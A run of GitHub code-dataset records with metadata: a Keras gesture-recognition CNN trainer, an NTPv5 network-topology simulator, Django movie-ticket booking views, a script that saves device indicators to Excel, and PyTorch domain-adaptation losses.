"\"\"\"\nhttp://www.cnblogs.com/aoru45/p/9748475.html\nhttps://github.com/asingh33/CNNGestureRecognizer\nhttps://keras.io/backend/#function\n\"\"\"\nimport numpy as np\nimport pandas as pd\nfrom sklearn.utils import shuffle\nimport random\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation, Flatten\nfrom keras.layers import Conv2D, MaxPooling2D, ZeroPadding2D\nfrom keras.optimizers import SGD, RMSprop, adam\nfrom keras.utils.np_utils import to_categorical\nfrom keras.utils import plot_model\nfrom keras import backend as K\nK.backend()\nimport tensorflow as tf\nfrom PIL import Image\nimport os\nimport sys\nimport time\n\ndef loadCNN():\n\tglobal get_output\n\tmodel = Sequential()\n\tmodel.add(Conv2D(32,(5,5), padding=\"valid\", input_shape=(300,300,1)))\n\tconvout1 = Activation(\"relu\")\n\tmodel.add(convout1)\n\tmodel.add(MaxPooling2D(pool_size=(2,2)))\n\tmodel.add(Conv2D(64,(3,3)))\n\tconvout2 = Activation(\"relu\")\t\n\tmodel.add(convout2)\n\tmodel.add(MaxPooling2D(pool_size=(2,2)))\n\tmodel.add(Conv2D(64,(5,5)))\n\tconvout3 = Activation(\"relu\")\n\tmodel.add(convout3)\n\tmodel.add(MaxPooling2D(pool_size=(2,2)))\n\tmodel.add(Conv2D(64,(5,5)))\n\tconvout4 = Activation(\"relu\")\n\tmodel.add(convout4)\n\tmodel.add(MaxPooling2D(pool_size=(2,2)))\n\tmodel.add(Dropout(0.5))\n\tmodel.add(Flatten())\n\tmodel.add(Dense(512))\n\tmodel.add(Activation(\"relu\"))\n\tmodel.add(Dropout(0.5))\n\tmodel.add(Dense(128))\n\tmodel.add(Activation(\"relu\"))\n\tmodel.add(Dropout(0.5))\n\tmodel.add(Dense(3))\n\tmodel.add(Activation(\"softmax\"))\n\tmodel.compile(loss = \"categorical_crossentropy\", optimizer = \"adadelta\", metrics = ['accuracy'])\n\tmodel.summary()\n\tconfig = model.get_config()\n\tlayer = model.layers[11]\n\tget_output = K.function([model.layers[0].input, K.learning_phase()], [layer.output,])\n\treturn model\n\ndef initializers():\n\tx_data = []\n\ty_data = []\n\tfor i in range(3):\n\t\timglist = os.listdir('./train1/' + str(i))\n\t\tfor item in imglist:\n\t\t\timg = Image.open('./train1/' + str(i) +'/'+ item)\n\t\t\timg = np.array(img)\n\t\t\tx_data.append(img)\n\t\t\ty_data.append(i)\n\tx_data = np.array(x_data,dtype='f')\n\tx_data = x_data/255.0 \n\ty_data = np.array(y_data)\n\t#print(x_data.shape)\n\t#print(y_data.shape)\n\ty_data = to_categorical(y_data, num_classes=3)\n\tx_data, y_data = shuffle(x_data, y_data, random_state=2)\n\tx_data = x_data.reshape([-1, 300, 300, 1])\n\tprint(x_data.shape)\n\tprint(y_data.shape)\n\treturn x_data, y_data\n\t\nif __name__ == '__main__':\n\tx_data, y_data = initializers()\n\tmodel = loadCNN()\n\tprint(\"Training start: \" + time.asctime(time.localtime(time.time())))\n\thist = model.fit(x_data, y_data, batch_size = 32, epochs = 5, verbose = 1, validation_split = 0.1)\n\tmodel.save_weights('./model/model_3.hdf5', overwrite = True)\n\tprint(\"Training end: \" + time.asctime(time.localtime(time.time())))\n\n", "repo_name": "xiaoral2/Deep-Learning-by-Using-MapReduce-", "sub_path": "gesrecog.py", "file_name": "gesrecog.py", "file_ext": "py", "file_size_in_byte": 2748, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "keras.backend.backend", "line_number": 17, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 17, "usage_type": "name"}, {"api_name": "keras.models.Sequential", "line_number": 26, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 27, "usage_type": "call"}, {"api_name": "keras.layers.Activation", "line_number": 28, "usage_type": "call"}, {"api_name": "keras.layers.MaxPooling2D", "line_number": 30, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 31, "usage_type": "call"}, {"api_name": "keras.layers.Activation", "line_number": 32, "usage_type": "call"}, {"api_name": "keras.layers.MaxPooling2D", "line_number": 34, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 35, "usage_type": "call"}, {"api_name": "keras.layers.Activation", "line_number": 36, "usage_type": "call"}, {"api_name": "keras.layers.MaxPooling2D", "line_number": 38, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 39, "usage_type": "call"}, {"api_name": "keras.layers.Activation", "line_number": 40, "usage_type": "call"}, {"api_name": "keras.layers.MaxPooling2D", "line_number": 42, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 43, "usage_type": "call"}, {"api_name": "keras.layers.Flatten", "line_number": 44, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 45, "usage_type": "call"}, {"api_name": "keras.layers.Activation", "line_number": 46, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 47, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 48, "usage_type": "call"}, {"api_name": "keras.layers.Activation", "line_number": 49, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 50, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 51, "usage_type": "call"}, {"api_name": "keras.layers.Activation", "line_number": 52, "usage_type": "call"}, {"api_name": "keras.backend.function", "line_number": 57, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 57, "usage_type": "name"}, {"api_name": "keras.backend.learning_phase", "line_number": 57, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 64, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 66, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 66, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 72, "usage_type": "call"}, {"api_name": "keras.utils.np_utils.to_categorical", "line_number": 75, "usage_type": "call"}, {"api_name": "sklearn.utils.shuffle", "line_number": 76, "usage_type": "call"}, {"api_name": "time.asctime", "line_number": 85, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 85, "usage_type": "call"}, {"api_name": "time.time", "line_number": 85, "usage_type": "call"}, {"api_name": "time.asctime", "line_number": 88, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 88, "usage_type": "call"}, {"api_name": "time.time", "line_number": 88, "usage_type": "call"}]} +{"seq_id": "25674157892", "text": "import argparse\nimport logging\nimport select\nimport sys\nimport time\n\nimport ntpnode\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Test NTPv5 nodes in simulated network.\")\n parser.add_argument(\"primary_nodes\", help=\"number of stratum=1 nodes\", type=int)\n parser.add_argument(\"secondary_nodes\", help=\"number of stratum>1 nodes\", type=int)\n parser.add_argument(\"topology\", help=\"network topology of stratum>1 nodes (chain, uniring, biring, mesh)\")\n parser.add_argument(\"-p\", \"--first-port\", dest=\"first_port\", metavar=\"PORT\", type=int,\n default=10123, help=\"specify port of first node (default 10123)\")\n parser.add_argument(\"-v\", \"--version\", dest=\"version\", metavar=\"VERSION\", type=int,\n default=0, help=\"specify client NTP version (default negotiation)\")\n parser.add_argument(\"-i\", \"--poll\", dest=\"poll\", type=int,\n default=0, help=\"specify polling interval in log2 seconds (default 0)\")\n parser.add_argument(\"-s\", \"--stop\", dest=\"stop_polls\", metavar=\"POLLS\", type=int,\n default=0, help=\"stop after POLLS identical selections\")\n parser.add_argument(\"-f\", \"--refids-fragments\", dest=\"refids_fragments\", metavar=\"NUMBER\", type=int,\n default=4, help=\"specify number of Bloom filter fragments (default 4)\")\n parser.add_argument(\"-r\", \"--dispersion-rate\", dest=\"dispersion_rate\", metavar=\"RATE\", type=float,\n default=5e-3, help=\"specify dispersion rate (default 5e-3)\")\n parser.add_argument(\"-m\", \"--max-distance\", dest=\"max_distance\", metavar=\"DIST\", type=float,\n default=1e-1, help=\"specify dispersion rate (default 1e-1)\")\n parser.add_argument(\"-d\", \"--debug\", dest=\"debug\", action=\"count\",\n default=0, help=\"increase debug level\")\n\n args = parser.parse_args()\n\n logging.basicConfig(format=\"%(message)s\")\n logging.getLogger().setLevel([logging.WARN, logging.INFO, logging.DEBUG][args.debug])\n\n nodes = []\n\n print(\"Network:\")\n\n for i in range(args.primary_nodes):\n nodes.append(ntpnode.NtpNode(True, args.first_port + i, args.max_distance, args.dispersion_rate,\n False, [], args.version, args.poll, False, args.refids_fragments))\n print(\" {}\".format(i))\n\n for i in range(args.secondary_nodes):\n servers=[]\n ids=[]\n for j in range(args.secondary_nodes):\n if args.topology == \"chain\":\n if i - 1 != j:\n continue\n elif args.topology == \"uniring\":\n if i not in (j + 1, j - args.secondary_nodes + 1):\n continue\n elif args.topology == \"biring\":\n if i not in (j - 1, j + 1, j - args.secondary_nodes + 1, j + args.secondary_nodes - 1):\n continue\n elif args.topology == \"mesh\":\n if i == j:\n continue\n else:\n logging.error(\"Unknown topology\")\n sys.exit(1)\n servers.append(\"127.0.0.1:{}\".format(args.first_port + args.primary_nodes + j))\n ids.append(args.primary_nodes + j)\n if i < args.primary_nodes:\n servers.append(\"127.0.0.1:{}\".format(args.first_port + i))\n ids.append(i)\n\n print(\" {} <- {}\".format(args.primary_nodes + i, ids))\n\n nodes.append(ntpnode.NtpNode(False, args.first_port + args.primary_nodes + i, args.max_distance,\n args.dispersion_rate,\n True, servers, args.version, args.poll, False, args.refids_fragments))\n\n last_sels = []\n unchanged_sels = 0\n start_time = time.monotonic()\n\n while True:\n descriptors = []\n timeout = 1e10\n for node in nodes:\n timeout = min(timeout, node.get_timeout())\n descriptors += node.get_descriptors()\n\n rlist, _, _ = select.select(descriptors, [], [], timeout)\n\n for node in nodes:\n node.process_events(wait=False)\n\n if not rlist:\n print(\"Selection at {:.1f}:\".format(time.monotonic() - start_time))\n\n sels = []\n for i, node in enumerate(nodes):\n ids = [s[1] - args.first_port for s in node.selected_sources]\n sels.append(set(ids))\n print(\" {} <- {}\".format(i, ids))\n\n looped = []\n for i in range(len(nodes)):\n visited = sels[i]\n while True:\n prev_len = len(visited)\n for j in list(visited):\n visited |= sels[j]\n if i in visited:\n looped.append(i)\n break\n if prev_len == len(visited):\n break\n\n print(\"Looped nodes: {}\".format(looped))\n\n if sels == last_sels:\n unchanged_sels += 1\n if args.stop_polls > 0 and unchanged_sels >= args.stop_polls:\n break\n else:\n unchanged_sels = 0\n last_sels = sels\n", "repo_name": "mlichvar/ntp5-exp", "sub_path": "network.py", "file_name": "network.py", "file_ext": "py", "file_size_in_byte": 5221, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 10, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 33, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 34, "usage_type": "call"}, {"api_name": "logging.WARN", "line_number": 34, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 34, "usage_type": "attribute"}, {"api_name": "logging.DEBUG", "line_number": 34, "usage_type": "attribute"}, {"api_name": "ntpnode.NtpNode", "line_number": 41, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 62, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 63, "usage_type": "call"}, {"api_name": "ntpnode.NtpNode", "line_number": 72, "usage_type": "call"}, {"api_name": "time.monotonic", "line_number": 78, "usage_type": "call"}, {"api_name": "select.select", "line_number": 87, "usage_type": "call"}, {"api_name": "time.monotonic", "line_number": 93, "usage_type": "call"}]} +{"seq_id": "28835776761", "text": "from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom . models import movie,ticket\nfrom datetime import datetime\n# Create your views here.\ndef index (requests):\n movies = movie.objects.all()\n return render(requests,'index.html',{'movies':movies})\n\ndef bookt(requests):\n movie1=requests.GET['movie']\n booking=int(requests.GET['booking'])\n nos=int(requests.GET['nos'])\n username=requests.GET['name']\n phone=requests.GET['phone']\n booking=booking-nos\n book_time=datetime.now()\n ticket1 = ticket.objects.create(movie=movie1, book_time=book_time,user=username,phone=phone,nos=nos)\n movie.objects.filter(name=movie1).update(bookings=booking)\n obj= ticket.objects.get(movie=movie1, book_time=book_time,user=username,phone=phone,nos=nos)\n id=obj.id\n return render(requests,'booked.html',{'obj':obj})\n\ndef delt(requests):\n ticketid=requests.GET['id']\n movie2=requests.GET['movienm']\n obj = movie.objects.get(name=movie2)\n booking=int(obj.bookings)\n nos=int(requests.GET['nos'])\n username=requests.GET['username']\n phone=requests.GET['phone']\n book=booking+nos\n objt=ticket.objects.get(id=ticketid,user=username,phone=phone)\n print(objt.nos)\n left=objt.nos-nos\n if(left>0):\n movie.objects.filter(name=movie2).update(bookings=book)\n ticket.objects.filter(id=ticketid,user=username,phone=phone).update(nos=left)\n else :\n ticket.objects.filter(id=ticketid,user=username,phone=phone).delete()\n return render(requests,'deleted.html')\n\ndef delete(requests):\n return render(requests,'delete.html')\n\ndef updatetime(requests):\n return render(requests,'updateticket.html')\n\ndef viewticket(requests):\n return render(requests,'viewticket.html')\n\ndef details(requests):\n return render(requests,'userdetails.html')\n\ndef updatetimefn(requests):\n tid=int(requests.GET['tcid'])\n timing_start=requests.GET['ts']\n timing_end=requests.GET['te']\n movie.objects.filter(id=tid).update(time_start=timing_start,time_end=timing_end)\n return render(requests,'updated.html')\n\ndef viewticketfn(requests):\n timing_start=requests.GET['ts']\n obj=movie.objects.get(time_start=timing_start)\n mov=obj.name\n print(mov)\n tts=ticket.objects.filter(movie=mov)\n print(tts)\n return render(requests,'viewticketdisplay.html',{'obj':tts})\n\ndef userdetailsfn(requests):\n tid=int(requests.GET['tcid'])\n print(tid)\n obj=ticket.objects.get(id=tid)\n print (obj.phone)\n return render(requests,'userdetailsdisplay.html',{'obj':obj})\n\n\n", "repo_name": "kumaranubhav1654/Django-MOVIE-Ticket-booking", "sub_path": "tickets/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2566, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "models.movie.objects.all", "line_number": 7, "usage_type": "call"}, {"api_name": "models.movie.objects", "line_number": 7, "usage_type": "attribute"}, {"api_name": "models.movie", "line_number": 7, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 8, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 17, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 17, "usage_type": "name"}, {"api_name": "models.ticket.objects.create", "line_number": 18, "usage_type": "call"}, {"api_name": "models.ticket.objects", "line_number": 18, "usage_type": "attribute"}, {"api_name": "models.ticket", "line_number": 18, "usage_type": "name"}, {"api_name": "models.movie.objects.filter", "line_number": 19, "usage_type": "call"}, {"api_name": "models.movie.objects", "line_number": 19, "usage_type": "attribute"}, {"api_name": "models.movie", "line_number": 19, "usage_type": "name"}, {"api_name": "models.ticket.objects.get", "line_number": 20, "usage_type": "call"}, {"api_name": "models.ticket.objects", "line_number": 20, "usage_type": "attribute"}, {"api_name": "models.ticket", "line_number": 20, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 22, "usage_type": "call"}, {"api_name": "models.movie.objects.get", "line_number": 27, "usage_type": "call"}, {"api_name": "models.movie.objects", "line_number": 27, "usage_type": "attribute"}, {"api_name": "models.movie", "line_number": 27, "usage_type": "name"}, {"api_name": "models.ticket.objects.get", "line_number": 33, "usage_type": "call"}, {"api_name": "models.ticket.objects", "line_number": 33, "usage_type": "attribute"}, {"api_name": "models.ticket", "line_number": 33, "usage_type": "name"}, {"api_name": "models.movie.objects.filter", "line_number": 37, "usage_type": "call"}, {"api_name": "models.movie.objects", "line_number": 37, "usage_type": "attribute"}, {"api_name": "models.movie", "line_number": 37, "usage_type": "name"}, {"api_name": "models.ticket.objects.filter", "line_number": 38, "usage_type": "call"}, {"api_name": "models.ticket.objects", "line_number": 38, "usage_type": "attribute"}, {"api_name": "models.ticket", "line_number": 38, "usage_type": "name"}, {"api_name": "models.ticket.objects.filter", "line_number": 40, "usage_type": "call"}, {"api_name": "models.ticket.objects", "line_number": 40, "usage_type": "attribute"}, {"api_name": "models.ticket", "line_number": 40, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 41, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 44, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 47, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 50, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 53, "usage_type": "call"}, {"api_name": "models.movie.objects.filter", "line_number": 59, "usage_type": "call"}, {"api_name": "models.movie.objects", "line_number": 59, "usage_type": "attribute"}, {"api_name": "models.movie", "line_number": 59, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 60, "usage_type": "call"}, {"api_name": "models.movie.objects.get", "line_number": 64, "usage_type": "call"}, {"api_name": "models.movie.objects", "line_number": 64, "usage_type": "attribute"}, {"api_name": "models.movie", "line_number": 64, "usage_type": "name"}, {"api_name": "models.ticket.objects.filter", "line_number": 67, "usage_type": "call"}, {"api_name": "models.ticket.objects", "line_number": 67, "usage_type": "attribute"}, {"api_name": "models.ticket", "line_number": 67, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 69, "usage_type": "call"}, {"api_name": "models.ticket.objects.get", "line_number": 74, "usage_type": "call"}, {"api_name": "models.ticket.objects", "line_number": 74, "usage_type": "attribute"}, {"api_name": "models.ticket", "line_number": 74, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 76, "usage_type": "call"}]} +{"seq_id": "31661694394", "text": "import requests\nimport json\nimport xlwt\nimport xlrd\n\n\nworkbook = xlwt.Workbook()\nrworkbook = xlrd.open_workbook('E:\\env.xls')\n\nwworkbook = workbook.add_sheet('Temperture', cell_overwrite_ok=True)\n# 表第一个单元\n# 请求指标\nurlList = [' http://172.17.13.96:16380/envDevice/getEnvIndicatorByMonitorDeviceIds', ' http://172.17.13.92:16380/envDevice/getEnvIndicatorByMonitorDeviceIds']\n\nListNotNull = True\n\n\ndef getData(urlnum):\n envurl = urlList[urlnum]\n print('请求第次', str(urlnum))\n res = requests.post(envurl, data={\"type\": \"1,2\"})\n resdatalist = res.json()['data']\n # print(resdatalist)\n return resdatalist\n\ndef getEnvName(datalist, x):\n envname = datalist[x]['name']\n # print(envname)\n return envname\n\ndef getEnvValuesList(valeslist , x ):\n envvaluesList = valeslist[x]['indicatorList']\n # listornot = type(envvaluesList)\n # print(listornot)\n return envvaluesList\n\ndef whitchtype(data):\n datawhitchtype = data\n print(datawhitchtype)\n whitchtype = type(datawhitchtype)\n print(whitchtype)\n\ndef getEnvvalues(valueslist, line):\n # whitchtype(valueslist)\n # d = [ ]\n i = line +1\n j = 1\n for x in range(len(envvalueslist)):\n envvalueslistdict = envvalueslist[x]\n envvalueslistdict.items()\n for key, value in envvalueslistdict.items():\n # wworkbook.write(i, j , key)\n writeToExcel(key,i, j)\n writeToExcel(value, i, j+1)\n # wworkbook.write(i, j+1 , value)\n # print(key)\n # print(value)\n j += 2\n j += 1\n\ndef writeToExcel(obj, row ,col):\n wworkbook.write(row, col, obj)\n\nlisrnum = 0\n# envdata = getData(lisrnum)\nenvdata = getData(lisrnum)\n\nwhile ListNotNull:\n # list是空的问题先不考虑\n flag = 0\n for i in range(len(envdata)):\n envData = envdata\n wenvname = getEnvName(envData, i)\n writeToExcel(wenvname , 0 , 0)\n envvalueslist = getEnvValuesList(envData, i)\n print(envvalueslist)\n getEnvvalues(envvalueslist, i)\n flag += 1\n if flag == int(len(envvalueslist)):\n print('envvalueslist取完了')\n lisrnum += 1\n if i == int(len(envdata) - 1):\n print('循环完了')\n ListNotNull = False\n else:\n ListNotNull = True\n\n\nworkbook.save(r'E:\\env.xls')\n\n\n\n\n# # 做参考\n# ll = list(resdatalist[0].keys())\n# ld = list(resdatalist[0].values())\n# print(ll)\n# print(ld)\n# for i in range(len(ll)):\n# print(ll[i])\n# print(ld[i])\n# temp.write(0, i, ll[i])\n# temp.write(1, i, str(ld[i]))\n#\n# indicdata = resdatalist[0]['indicatorList']\n#\n# nub00 = str(rworkbook.sheet_by_name('Temperture').cell(rworkbook, 0, 0).value)\n# print(nub00)\n# # 写表头\n# def wtittle():\n# tittlelist = list(indicdata[0].keys())\n# print(tittlelist)\n# for i in range(len(tittlelist)):\n# temp.write(2, i, tittlelist[i])\n#\n# if nub00 == 'name':\n# print(\"表头写好了\")\n# else:\n# wtittle()\n\n\n# indicdatatil = list(indicdata[0].keys())\n#\n# for i in range(len(indicdata)):\n# devname = indicdata[i]['name']\n# devvalue = indicdata[i]['value']\n# devtype = indicdata[i]['type']\n# devalarm = indicdata[i]['alarm']\n# titlevalue = [devname, devvalue, devtype, devalarm]\n# # onlytemp.write(0 , i , indicdatatil[i])\n# for j in range(len(indicdatatil)):\n# temp.write(j , {i + 1} , indicdatatil[i])\n# print(devname)\n\n\n\n # temp.write(1, i, int(ld['id']))\n# print(ll[0])\n\n\n\n# resdataindicatoerlist = resdatalist[0]['indicatorList']\n# zhibiao = len(resdataindicatoerlist)\n# print(zhibiao)\n\n\n#\n#\n# for x in range(len(resdataindicatoerlist)):\n# print(str(resdataindicatoerlist[x]))\n# data = str(resdataindicatoerlist[x])\n# indicname = data['name']\n# indicvla = data['value']\n#\n# x += 1\n\n\n\n# print(nevname)\n\n\n\n\n\n", "repo_name": "Questyou/URMTest", "sub_path": "动环设备指标获取.py", "file_name": "动环设备指标获取.py", "file_ext": "py", "file_size_in_byte": 3855, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "xlwt.Workbook", "line_number": 7, "usage_type": "call"}, {"api_name": "xlrd.open_workbook", "line_number": 8, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 21, "usage_type": "call"}]} +{"seq_id": "44148902981", "text": "from typing import *\nimport torch\nimport torch.nn as nn \nfrom torch import Tensor\nimport torch.nn.functional as F \n\n\nclass ClassificationLoss(nn.Module):\n # equivalent to tensoflow's softmax_cross_enropy_with_logits loss\n def __init__(self):\n super().__init__()\n\n def forward(self, logits: Tensor, labels: Tensor) -> Tensor:\n loss = torch.sum(- labels * F.log_softmax(logits, -1), -1)\n return loss.mean()\n\n\nclass DomainLoss(nn.Module):\n # discriminate input images as source / target\n def __init__(self):\n super().__init__()\n \n def forward(self, logits: Tensor, domain: Tensor, target_start_id: Optional[int] = None) -> Tuple[Tensor, Tensor]:\n # if not given, assumes 50% source - 50% target in batch\n target_start_id = logits.shape[0] // 2 if target_start_id is None else target_start_id\n\n # discriminate domain of input \n domain_loss = F.binary_cross_entropy_with_logits(logits, domain)\n\n # adversarial loss for the target data\n logits_target = logits[target_start_id:]\n adv_domain_target = torch.logical_not(domain)[target_start_id:].float()\n adv_domain_loss = F.binary_cross_entropy_with_logits(logits_target, adv_domain_target)\n\n return domain_loss, adv_domain_loss\n\n\nclass SoftTripletKLLoss(nn.Module):\n def __init__(self, margin: float, sigmas: List[float], l2_normalization: bool):\n super().__init__()\n self.margin = margin \n self.sigmas = sigmas \n self.l2_normalization = l2_normalization\n self.pdist_norm = lambda x: torch.square(x).sum(1)\n\n def forward(self, embs: Tensor, labels: Tensor) -> Tensor:\n num_anchors = embs.shape[0]\n labels = labels.argmax(-1)\n if self.l2_normalization:\n embs = F.normalize(embs, p=2, dim=1)\n\n pdist_matrix = self.pdist_norm(embs.unsqueeze(2) - embs.T).T\n beta = 1. / (2. * torch.tensor(self.sigmas, device=embs.device).unsqueeze(1))\n pdist_matrix = torch.matmul(-beta, pdist_matrix.flatten().unsqueeze(0))\n pdist_matrix = pdist_matrix.exp().sum(0).view(num_anchors, num_anchors)\n pdist_matrix /= pdist_matrix.sum(1).unsqueeze(1)\n\n mask_positives = (labels.unsqueeze(0) == labels.unsqueeze(1)).float()\n mask_negatives = torch.logical_not(mask_positives).float()\n \n anchors_rep = torch.tile(pdist_matrix, [1, num_anchors])\n anchors_rep = anchors_rep.reshape(num_anchors * num_anchors, num_anchors)\n anchors_rep_t = torch.tile(pdist_matrix, [num_anchors, 1])\n\n kl_loss = (anchors_rep * (anchors_rep.log() - anchors_rep_t.log())).sum(1)\n kl_loss = kl_loss.view(num_anchors, num_anchors)\n kl_div_pw_pos = torch.multiply(mask_positives, kl_loss)\n kl_div_pw_neg = torch.multiply(mask_negatives, kl_loss)\n kl_loss = kl_div_pw_pos.mean(1, keepdim=True) - kl_div_pw_neg.mean(1, keepdim=True) + torch.tensor(self.margin)\n kl_loss = torch.maximum(kl_loss, torch.zeros_like(kl_loss))\n\n return kl_loss.mean()\n\n\nclass ConditionalDomainLoss(nn.Module):\n def __init__(self, num_classes: int):\n super().__init__()\n self.num_classes = num_classes\n\n def forward(self, logits_list: List[Tensor], labels: Tensor, domain: Tensor, target_start_id: int) -> Tuple[Tensor, Tensor]:\n batch_size = labels.shape[0]\n sizing = [target_start_id, batch_size - target_start_id]\n labels_source, labels_target = torch.split(labels, sizing)\n domain_source, domain_target = torch.split(domain, sizing)\n logits_list_source, logits_list_target = zip(*[torch.split(l, sizing) for l in logits_list])\n\n lossA, lossB = 0., 0.\n for class_id in range(self.num_classes):\n is_class_source = (labels_source.argmax(1) == class_id).unsqueeze(1) \n masked_domain_source = torch.masked_select(domain_source, is_class_source).view(-1, 2)\n masked_class_dann_source = torch.masked_select(logits_list_source[class_id], is_class_source).view(-1, 2)\n\n is_class_target = (labels_target.argmax(1) == class_id).unsqueeze(1) \n masked_domain_target = torch.masked_select(domain_target, is_class_target).view(-1, 2)\n masked_class_dann_target = torch.masked_select(logits_list_target[class_id], is_class_target).view(-1, 2)\n masked_adv_domain_target = torch.masked_select(torch.logical_not(domain_target).float(), is_class_target).view(-1, 2)\n \n masked_domain = torch.cat((masked_domain_source, masked_domain_target), dim=0)\n masked_class_dann = torch.cat((masked_class_dann_source, masked_class_dann_target), dim=0)\n \n lossA += F.binary_cross_entropy_with_logits(masked_class_dann, masked_domain)\n lossB += F.binary_cross_entropy_with_logits(masked_class_dann_target, masked_adv_domain_target) \n \n lossA /= self.num_classes\n lossB /= self.num_classes\n \n return lossA, lossB", "repo_name": "gtziafas/dirl_pytorch", "sub_path": "digits/dirl_losses.py", "file_name": "dirl_losses.py", "file_ext": "py", "file_size_in_byte": 5014, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "torch.nn.Module", "line_number": 8, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 8, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 13, "usage_type": "name"}, {"api_name": "torch.sum", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.nn.functional.log_softmax", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 14, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 18, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 18, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 23, "usage_type": "name"}, {"api_name": "torch.nn.functional.binary_cross_entropy_with_logits", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 28, "usage_type": "name"}, {"api_name": "torch.logical_not", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.nn.functional.binary_cross_entropy_with_logits", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 33, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 38, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 38, "usage_type": "name"}, {"api_name": "torch.square", "line_number": 44, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 46, "usage_type": "name"}, {"api_name": "torch.nn.functional.normalize", "line_number": 50, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 50, "usage_type": "name"}, {"api_name": "torch.tensor", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.matmul", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.logical_not", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.tile", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.tile", "line_number": 63, "usage_type": "call"}, {"api_name": "torch.multiply", "line_number": 67, "usage_type": "call"}, {"api_name": "torch.multiply", "line_number": 68, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.maximum", "line_number": 70, "usage_type": "call"}, {"api_name": "torch.zeros_like", "line_number": 70, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 75, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 75, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 80, "usage_type": "name"}, {"api_name": "torch.split", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.split", "line_number": 84, "usage_type": "call"}, {"api_name": "torch.split", "line_number": 85, "usage_type": "call"}, {"api_name": "torch.masked_select", "line_number": 90, "usage_type": "call"}, {"api_name": "torch.masked_select", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.masked_select", "line_number": 94, "usage_type": "call"}, {"api_name": "torch.masked_select", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.masked_select", "line_number": 96, "usage_type": "call"}, {"api_name": "torch.logical_not", "line_number": 96, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 98, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 99, "usage_type": "call"}, {"api_name": "torch.nn.functional.binary_cross_entropy_with_logits", "line_number": 101, "usage_type": "call"}, {"api_name": "torch.nn.functional", 